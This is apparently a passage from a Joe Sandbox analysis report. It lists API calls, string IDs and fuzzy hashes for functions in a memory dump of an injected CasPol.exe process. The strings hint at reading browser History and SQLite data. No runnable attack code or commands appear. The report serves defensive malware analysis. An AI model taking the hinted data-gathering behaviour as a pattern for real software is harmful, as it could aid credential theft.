                                                                                                                                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                    • String ID: General
                                                                                                                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                                                                                                                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                                                                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                    • API String ID: 0-1953309616
                                                                                                                                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                                                                                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4053608372-0
                                                                                                                                                                                                                    • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                                                                                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                                                                                                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _memicmpwcslen
                                                                                                                                                                                                                    • String ID: @@@@$History
                                                                                                                                                                                                                    • API String ID: 1872909662-685208920
                                                                                                                                                                                                                    • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                                                                                                                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                                                    • API String ID: 210187428-168460110
                                                                                                                                                                                                                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                    • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll,750A375A,?,00405751,00000000), ref: 00414E2B
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                    • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
